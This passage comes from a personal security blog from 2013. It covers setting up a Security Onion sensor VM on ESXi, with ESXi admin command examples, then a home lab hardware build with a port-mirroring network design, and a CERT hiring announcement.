Finally, I created the virtual disk. This includes deciding whether to thin provision, thick provision lazy zeroed, or thick provision eager zeroed, meaning prepare the disk ahead of time. The documentation states that eager zeroed supports clustering for fault tolerance. I chose thick provisioned for my Security Onion since I knew with certainty that the virtual disk would get filled with NSM data like packet captures and logs. There are a number of KB and blog posts on the VMware site that detail advantages and disadvantages of the different provisioning methods.
The final settings for my Security Onion VM

Once the VM was configured on ESXi, I still needed to actually install Security Onion. You can do it the old-fashioned way by burning a disc and using the CD/DVD drive, but I used mounted the ISO. To do this, you just need to start the VM, which doesn't yet have an OS, then open a console in vSphere and click the button to mount the ISO in the virtual CD drive so it will boot to the disc image and start the installation process. The vSphere console is a similar view and interface to Fusion or Workstation and mounting the ISO works essentially the same way.

The time it took from hitting the button to create a VM to the time I had a running Security Onion sensor was quite short. I had a couple small problems after the initial installation. First, in ESXi you have to manually go to the NIC settings and check a box that allows it to sniff all the traffic. My sniffing interface was initially not seeing the traffic when I checked with tcpdump, which made me realize it was probably not yet in promiscuous mode.

Second, the 4GB RAM and one CPU I had initially allocated was insufficient. When the sensor was running and I tried to update Ubuntu, the system became very unresponsive. I eventually doubled the RAM to 8GB and the number of cores to two, which resolved the issue. I think at this point that I could probably actually drop back down to 4GB of RAM, but since the system has 32GB I don't need to worry about it yet.

Other ESXi Notes

Although ESXi is stripped pretty bare of common Linux utilities and commands, there is plenty you can do from a command line through SSH instead of using vSphere. For example, to list all VMs on the system, power on my Windows 7 VM, and find the IP address so I can connect through RDP:

# vim-cmd vmsvc/getallvms
Vmid        Name                            File                           Guest OS       Version   Annotation
1      Security Onion   [vmstore0] Security Onion/Security Onion.vmx   ubuntu64Guest      vmx-08              
13     Windows 7 x64    [vmstore0] Windows 7 x64/Windows 7 x64.vmx     windows7_64Guest   vmx-09              
6      CentOS 64-bit    [vmstore0] CentOS 64-bit/CentOS 64-bit.vmx     centos64Guest      vmx-08 
~ # vim-cmd vmsvc/power.on 13
~ # vim-cmd vmsvc/get.guest 13 | grep -m 1 ipAddress
   ipAddress = "",

I can get smartd information from my hard drive if needed.

~ # esxcli storage core device list
   Display Name: Local ATA Disk (t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF)
   Has Settable Display Name: true
   Size: 953869
   Device Type: Direct-Access 
   Multipath Plugin: NMP
   Devfs Path: /vmfs/devices/disks/t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
   Vendor: ATA     
   Model: ST1000DM003-1CH1
   Revision: CC44
   SCSI Level: 5
   Is Pseudo: false
   Status: on
   Is RDM Capable: false
   Is Local: true
   Is Removable: false
   Is SSD: false
   Is Offline: false
   Is Perennially Reserved: false
   Queue Full Sample Size: 0
   Queue Full Threshold: 0
   Thin Provisioning Status: unknown
   Attached Filters: 
   VAAI Status: unknown
   Other UIDs: vml.01000000002020202020202020202020205a31443347484b46535431303030
   Is Local SAS Device: false
   Is Boot USB Device: false

~ # esxcli storage core device smart get -d t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
Parameter                     Value  Threshold  Worst
----------------------------  -----  ---------  -----
Health Status                 OK     N/A        N/A  
Media Wearout Indicator       N/A    N/A        N/A  
Write Error Count             N/A    N/A        N/A  
Read Error Count              115    6          99   
Power-on Hours                100    0          100  
Power Cycle Count             100    20         100  
Reallocated Sector Count      100    10         100  
Raw Read Error Rate           115    6          99   
Drive Temperature             32     0          40   
Driver Rated Max Temperature  68     45         65   
Write Sectors TOT Count       200    0          200  
Read Sectors TOT Count        N/A    N/A        N/A  
Initial Bad Block Count       100    99         100  

There is a lot more you can do from the ESXi command line interface, but I should emphasize again that it is stripped fairly bare and does not have a lot of commands you expect if you come from a Linux or Unix background. Even some of the utilities that are available do not have some of the options or functionality you would expect. The CLI commands will generally list options or help when run without arguments. You can also get plenty of CLI documentation from VMware.

Next Steps

I now have a number of VMs installed, including a CentOS snapshot, FreeBSD, and my Windows 7 VM. My next steps will include setting up some VLANs to have some fun with a vulnerable network and an attacker network that will include KaliLinux. I am intimately familiar with Sguil and some of the other tools in Security Onion, but also hope to dig into Suricata and Bro more than I have in the past.

I also hope that my lab will provide some interesting material for future blog posts.

04 April, 2013

New Home Lab Configuration

I received all my new equipment for my home lab a couple of days ago. After setting up the hardware in less than a day, I'm quite happy with it so far.

I was lucky enough to have two 12-year-olds assist me when I assembled the computer. This was their first time assembling a computer from parts and they really enjoyed it.

The first component was the Shuttle SH67H3. My friend Richard recommended the DS61, but I had two main problems with that barebones system. First, it only has two RAM slots for a maximum of 16GB. That's not bad, but I decided I wanted to get a desktop that supported more RAM without going to server components while keeping the form factor small. I actually may have a second system on my purchase list for sometime this year, and in that case I would definitely consider the DS61.

Second, I had read that the SH67H3 worked as an ESXi whitebox. Overall, I am a fan of Shuttle barebones. The SH67H3 is essentially the same chassis my coworkers and I used on our lab network at a previous job, just with a new motherboard and other improvements. I used very similar or identical parts for my Shuttle as the ones listed in the ESXi whitebox link above.

When we popped the case open, it all looked pretty familiar and I explained the various pieces to the 12-year-olds. We removed the fan and heat sink array, which is a pretty nice low-noise setup. The case fan actually slides over the second heat sink so air blows over it on the way out the back of the chassis.
Don't forget to remove both the sticker from the heatsink and the plastic film that is on the CPU load plate before putting the CPU in the socket. After we inserted the Intel Core i7 2600, we applied thermal paste, reattached the passive cooling, and finally reattached the fan including plugging it back into the motherboard. We also inserted the four 8GB RAM sticks.
Shuttle SH76H3 motherboard with CPU and RAM installed
The fan slides over the heat sink at the rear of the chassis on the left
Next, we put the DVD/CD drive and hard drive into the tray, attached the tray to the chassis, and connected the SATA and power cables. I also added a dual Intel PRO/1000 PT NIC to give a total of three physical network interfaces. We finally tested and everything appeared to be working.

New Network Architecture

Going to all this trouble for a relatively powerful computer compared to my three old Pentium III servers, I decided to take the opportunity to make a couple of other network changes. I used to run my network sensor inline, but along with the new computer I purchased a Netgear GS108T-200 smart switch. This switch has an abundance of features, including VLANs and port mirroring. Along with the new switch, all I needed was an extra WAP to reconfigure home network as shown below.
The router/firewall also works as a WAP, but to see most client traffic
I disabled it and connected an access point behind the mirroring switch
With this configuration, the switch will mirror traffic to a dedicated network interface on my network sensor. Only traffic that doesn't make it to the switch will not be seen on the mirror port. I can also configure VLANs on the switch if I want to segment the network based on functions like management interfaces and WiFi clients.

I plan to write more about my lab setup as I continue to redevelop it. The first thing I did after testing the new box was install ESXi and create a network sensor VM using Security Onion. I may have a post about it soon.

29 March, 2013

CERT is hiring

The company I work for is hiring. For those that don't know, CERT is part of the Software Engineering Institute at Carnegie Mellon University. CERT was created in 1988 as part of the response to the Morris worm. You can find out more on CERT's "About Us" page.

If you are interested, please read more about our hiring process and browse some of the available positions. The positions are primarily in Pittsburgh with a few openings in Arlington, VA. The open positions cover network security analysis, security architecture, malware analysis, software development, vulnerability analysis, and more.

I consider our hiring process fairly grueling but also stimulating. It gives the prospective employee and prospective coworkers a good chance to really learn if the relationship will work. It is an opportunity not just for the candidate to get interviewed, but also for the candidate to interview those that already work at CERT.

One of the reasons we have so many vacant positions is because we try to maintain high standards when considering candidates. Most of our positions require a fair amount of experience and expertise. My colleagues are smart, diligent, and largely enthusiastic about their chosen professions. Don't get me wrong -- we still have bad days when we are less enthusiastic or unhappy about the state of information security, but this is a pretty cool place to work. We do a wide variety of both research and more operationally focused work, tackling a lot of big problems. We also get a fair amount of freedom to find interesting and challenging areas of work.

If I know you or know of your work, please contact me about using my name as a referral. A referral from a current CERT employee can be helpful when applying. The best way to contact me regarding a referral or to ask other questions is via email or LinkedIn. You can also post questions more publicly here on my blog if it seems appropriate. In the interest of disclosure, I have an interest in recruiting people that I will want to work with but also could potentially get a referral bonus if you list me when you apply.